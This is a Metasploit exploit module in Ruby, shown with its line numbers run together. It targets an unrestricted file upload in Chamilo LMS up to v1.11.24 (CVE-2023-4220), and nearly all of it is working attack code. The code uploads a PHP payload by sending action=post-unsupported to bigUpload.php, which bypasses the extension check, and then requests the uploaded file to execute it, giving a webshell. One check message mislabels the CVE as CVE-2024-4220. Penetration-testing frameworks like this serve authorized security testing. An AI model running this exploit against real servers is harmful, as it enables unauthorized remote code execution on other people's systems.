Path: blob/master/modules/exploits/linux/http/chamilo_bigupload_webshell.rb
31173 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::FileDropper10prepend Msf::Exploit::Remote::AutoCheck1112class UploadFileError < StandardError; end1314def initialize(info = {})15super(16update_info(17info,18'Name' => 'Chamilo v1.11.24 Unrestricted File Upload PHP Webshell',19'Description' => %q{20Chamilo LMS is a free software e-learning and content management system. In versions prior to <= v1.11.2421a webshell can be uploaded via the bigload.php endpoint. If the GET request parameter `action` is set to22`post-unsupported` file extension checks are skipped allowing for attacker controlled .php files to be uploaded to:23`/main/inc/lib/javascript/bigupload/files/` if the `/files/` directory already exists - it does not exist24by default.25},26'Author' => [27'Ngo Wei Lin', # discovery28'jheysel-r7' # module29],30'References' => [31[ 'URL', 'https://starlabs.sg/advisories/23/23-4220/'],32[ 'URL', 'https://github.com/H4cking4All/CVE-2023-4220/tree/main'],33[ 'CVE', '2023-4220']34],35'License' => MSF_LICENSE,36'Privileged' => false,37'Targets' => [38[39'PHP',40{41'Platform' => ['php'],42'Arch' => ARCH_PHP43}44],45],46'DisclosureDate' => '2023-11-28',47'Notes' => {48'Stability' => [ CRASH_SAFE, ],49'SideEffects' => [ ARTIFACTS_ON_DISK, ],50'Reliability' => [ REPEATABLE_SESSION, ]51}52)53)54end5556def check57res = send_request_cgi(58'method' => 'GET',59'uri' => normalize_uri(target_uri.path, '/main/inc/lib/javascript/bigupload/files/')60)6162return CheckCode::Safe('The directory /main/inc/lib/javascript/bigupload/files/ does not exist on the target') if res&.code == 4046364print_good('The directory /main/inc/lib/javascript/bigupload/files/ exists on the target indicating the target is vulnerable.')65test_file_content = rand_text_alphanumeric(8)66test_file_name = rand_text_alphanumeric(8)6768begin69upload_file(test_file_content, test_file_name)70rescue UploadFileError => e71return CheckCode::Safe("#{e.class}:#{e}")72end7374CheckCode::Vulnerable('File upload was successful (CVE-2024-4220 was exploited successfully).')75end7677def upload_file(file_contents, file_name)78vars_form_data = [79{80'name' => 'bigUploadFile',81'data' => file_contents,82'filename' => file_name,83'mime_type' => 'application/octet-stream'84}85]8687res = send_request_cgi(88'method' => 'POST',89'uri' => normalize_uri(target_uri.path, '/main/inc/lib/javascript/bigupload/inc/bigUpload.php'),90'vars_form_data' => vars_form_data,91'vars_get' => {92'action' => 'post-unsupported'93}94)9596raise UploadFileError, 'The file upload failed.' unless res&.code == 200 && res&.body == 'The file has successfully been uploaded.'9798register_file_for_cleanup(file_name)99end100101def exploit102file_contents = payload.encoded103file_name = "#{Rex::Text.rand_text_alpha(8..16)}.php"104105begin106upload_file(file_contents, file_name)107rescue UploadFileError => e108fail_with(Failure::UnexpectedReply, "#{e.class}:#{e}")109end110111send_request_cgi({112'method' => 'GET',113'uri' => normalize_uri('/main/inc/lib/javascript/bigupload/files', file_name)114})115end116end117118119